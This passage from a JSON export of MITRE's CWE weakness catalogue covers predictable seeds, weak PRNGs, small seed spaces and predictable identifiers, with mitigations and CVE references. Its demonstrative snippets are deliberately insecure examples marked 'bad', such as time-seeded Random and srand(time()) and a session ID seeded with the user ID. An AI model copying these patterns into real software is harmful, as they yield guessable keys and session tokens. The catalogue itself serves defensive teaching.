seed, such as the process ID or system time.","Extended_Description":"The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Use non-predictable inputs for seed generation."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2008-0166","Description":"The removal of a couple lines of code caused Debian\'s OpenSSL Package to only use the current process ID for seeding a PRNG","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"},{"Reference":"CVE-2018-9057","Description":"cloud provider product uses a non-cryptographically secure PRNG and seeds it with the current time","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9057"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Predictable Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"338":{"attr":{"@_ID":"338","@_Name":"Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG\'s algorithm is not cryptographically strong.","Extended_Description":{"xhtml:p":["When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks.","Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If a PRNG is used for authentication and authorization, such as a session ID or a seed for generating a cryptographic key, then an attacker may be able to easily guess the ID or cryptographic key and gain access to restricted functionality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Non-cryptographic PRNG"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Non-cryptographic PRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cryptographically Weak PRNG","attr":{"@_Date":"2014-06-23"}}]}},"339":{"attr":{"@_ID":"339","@_Name":"Small Seed Space in PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks.","Extended_Description":"PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying every possibility to see which seed matches the observed output, then the attacker will know the output of any subsequent calls to the PRNG. A small seed space implies that the attacker will have far fewer possible values to try to exhaust all possibilities.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"341","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use well vetted pseudo-random number generating algorithms with adequate length seeds. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"seed = os.urandom(2)random.seed(a=seed)key = random.getrandbits(128)","xhtml:i":"# getting 2 bytes of randomness for the seeding the PRNG","xhtml:br":["","","",""]}},"Body_Text":"Since only 2 bytes is used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-10908","Description":"product generates passwords via org.apache.commons.lang.RandomStringUtils, which uses java.util.Random internally. This PRNG has only a 48-bit seed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10908"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Seed Space in PRNG"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":[{"#text":"This entry may have a chaining relationship with predictable from observable state (CWE-341).","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}]}},"340":{"attr":{"@_ID":"340","@_Name":"Generation of Predictable Numbers or Identifiers","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a scheme that generates numbers or identifiers that are more predictable than required.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictability problems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Predictability Problems","attr":{"@_Date":"2020-02-24"}}}},"341":{"attr":{"@_ID":"341","@_Name":"Predictable from Observable State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness could be exploited by an attacker in a number ways depending on the context. If a predictable number is used to generate IDs or keys that are used within protection mechanisms, then an attacker could gain unauthorized access to the system. If predictable filenames are used for storing sensitive information, then an attacker might gain access to the system and may be able to gain access to the information in the file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0389","Description":"Mail server stores private mail messages with predictable filenames in a world-executable directory, which allows local users to read private mailing list archives.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389"},{"Reference":"CVE-2001-1141","Description":"PRNG allows attackers to use the output of small PRNG requests to determine the internal state information, which could be used by attackers to predict future pseudo-random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1141"},{"Reference":"CVE-2000-0335","Description":"DNS resolver library uses predictable IDs, which allows a local attacker to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"},{"Reference":"CVE-2005-1636","Description":"MFV. predictable filename and insecure permissions allows file modification to execute SQL queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1636"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable from Observable State"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"342":{"attr":{"@_ID":"342","@_Name":"Predictable Exact Value from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exact value or random number can be precisely predicted by observing previous values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1463","Description":"Firewall generates easily predictable initial sequence numbers (ISN), which allows remote attackers to spoof connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1463"},{"Reference":"CVE-1999-0074","Description":"Listening TCP ports are sequentially allocated, allowing spoofing attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0074"},{"Reference":"CVE-1999-0077","Description":"Predictable TCP sequence numbers allow spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0077"},{"Reference":"CVE-2000-0335","Description":"DNS resolver uses predictable IDs, allowing a local user to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Exact Value from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t 